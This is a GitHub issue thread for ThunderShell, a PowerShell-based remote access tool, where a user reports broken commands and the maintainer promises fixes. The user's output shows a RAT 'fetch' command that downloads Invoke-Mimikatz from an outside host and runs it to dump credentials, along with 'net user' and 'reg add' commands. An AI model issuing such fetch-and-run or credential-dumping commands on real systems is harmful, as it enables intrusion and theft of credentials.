Mr-Un1k0d3r / ThunderShell

Python / C# Unmanaged PowerShell based RAT
Other
772 stars 223 forks source link

problem in running commands #27

Closed itman224 closed 5 years ago

itman224 commented 5 years ago

cant run long commands like "reg add" anyway and i got error in running fetch command

Mr-Un1k0d3r commented 5 years ago

Can you provide more information about both issue like stack trace or command output so I can properly troubleshoot it.

Thanks,

itman224 commented 5 years ago

My Command : fetch https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1 Invoke-Mimikatz

Output :

[] Fetching https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1 [] Executing Invoke-Mimikatz


My Command :

Output :

Received Output: System.Management.Automation.CommandNotFoundException: The term 'refresh' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. at System.Management.Automation.Runspaces.PipelineBase.Invoke(IEnumerable input) at cWKciGwkR.mAqqCIvxwBVEvn.pfAvBXZq(String qwunaVNJrZAmMGx, String NjeoihMpPOM)


My Command : Net user (Username)

Output :

Output:


Most of CMD Commands dont work in This Version. But in old version of ThunderShell all this commands works.

itman224 commented 5 years ago

Thanks for your Support.

Mr-Un1k0d3r commented 5 years ago

I will fix the issue please note that refresh is not present anymore since the shell is using sync to pull the output manually.

I also implemented the shell command to run your command through cmd.exe /c

The fetch command issue was caused by the python3 byte format.

I'm going to push an update soon_

Mr-Un1k0d3r commented 5 years ago

version 3.1.1 was release and should address the issues.